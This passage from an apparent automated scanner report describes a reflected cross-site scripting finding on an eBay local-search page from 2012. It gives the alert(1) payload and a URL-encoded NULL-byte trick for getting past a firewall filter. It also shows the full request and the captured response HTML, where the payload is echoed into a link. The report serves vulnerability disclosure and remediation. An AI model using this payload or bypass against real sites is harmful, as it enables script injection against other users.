   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac8a63e4-->

1.4. http://local.ebay.com/local/localsch.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://local.ebay.com
Path:   /local/localsch.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003c2f0"><script>alert(1)</script>e1a026472a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c2f0"><script>alert(1)</script>e1a026472a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /local/localsch.html?_trksid=p5791.m1&_catid=12576&_location=75217&_nkw=rxss&dc13b%22%3E%3Cscript%3Ealert(1&%003c2f0"><script>alert(1)</script>e1a026472a2=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8b3236
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpPbYWM4YjMyMzYxMzQwYTAyYTA5NTFmZTYxZmZmZmUzOTYA7gBcTwaT22h0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sP19ua3c9cnhzcyZfZnBvcz03NTIxNyZfZmxwcmFkPTI1LjAmX2NhdGlkPTEyNTc2Cr4BcA**; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0PbYWM4YjMyMzYxMzQwYTAyYTA5NTFmZTYxZmZmZmUzOTYAywABTwVJYzFQIrlg; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:25:30 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 27428
Date: Thu, 05 Jan 2012 06:25:29 GMT
Cneonction: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - rxss</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325719836074" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325719836074;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AD1WaLJI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=rxss&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>    
   
   
       <div class="cat-W">
           <H4 class="cat-hdr">By Category</H4>
           <div class="cat-lst">
               <ul id="parUl">
                   
                   <li>
                   
                       <span class="selCat">Business & Industrial</span>
                                               
                                   
                       
                           <ul >
                               
                                   <li>                                        
                                       <a href="http://local.ebay.com:80/local/localsch.html?_trksid=p5791.m1&_catid=11765&_location=75217&_nkw=rxss&%003c2f0"><script>alert(1)</script>e1a026472a2=1">Construction </a>                                        
                                   </li>
                               
                           </ul>
                       
                       
                   </li>
                   
                   
               </ul>
           </div>
       </div>

       </div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>
<div class="fltr-W">
   <h4 class="fltr-hdr">BRAND</h4>
   <div class="fltr-lst">    
        <div name="filterForm" id="filterForm" style="max-height:250px;overflow:hidden">
           <div style="position:absolute;width:5px;right:5px;top:0;height:100%;z-index:1;">
                       <div id="dragelm" style="position: absolute; display:none;width: 5px; height: 30px; background: none repeat scroll 0% 0% #333; right: 0pt; top: -1px; left: 0px;">
                       </div>
           </div>
           <ul id="brandUl">            
               
               

               <li>                            
                        <div class="cb">    
                           <a href="javascript:;" title="Roxul" brand="Roxul" class=" ">Roxul</a>
                        </div>    
                       
               </li>

           
                       
           </ul>
       </div>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs">
<h4 class="fsHeader">Local Retailers :</h4><div class="fs" id="fs">
<span class="preS"><a class="pre db" id="pre" href="javascript:;"></a></span>
<div class="cntWrap" id="cntWrap">
<div class="cnt" id="cnt"><a href="javascript:;" title="Lowe's"><img class="" src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" merchant="4483" en="1" /><div class="msk"></div></a>
</div>
</div><span class="nextS"><a class="next db " id="next" href="javascript:;"></a></span>
<div class="clr"></div>
</div>
</div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=rxss" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='rxss' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="rxss" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="125"><div style="font-size: 13px; font-family: Arial; padding: 3px 0 0 0; color: #333333;float:left">1 results found</div><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:2px; float:right"><div></div><div style="clear:both"></div></div><div style="clear:both"></div></div></div><div>
<div class="lstWrap" id="lstWrap">

<div class="lst" type="products" id="item_1" offers="8679175">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/008/679/624/200/8679175_9912624_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=7641623&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(6)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div id="lstloading" class="lst-load"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div>    
</div>
</div><div><div style="padding:5px; background-color:#F5F5F5"><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:10px;font-size:11px;">Pricing &amp; inventory <a target="blank" href="/html/disclaimer.html">subject to Terms</a></div><div style="clear:both"></div></div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab0f55cc1340a5e2c6324c52ff8bfe90");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height: 100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
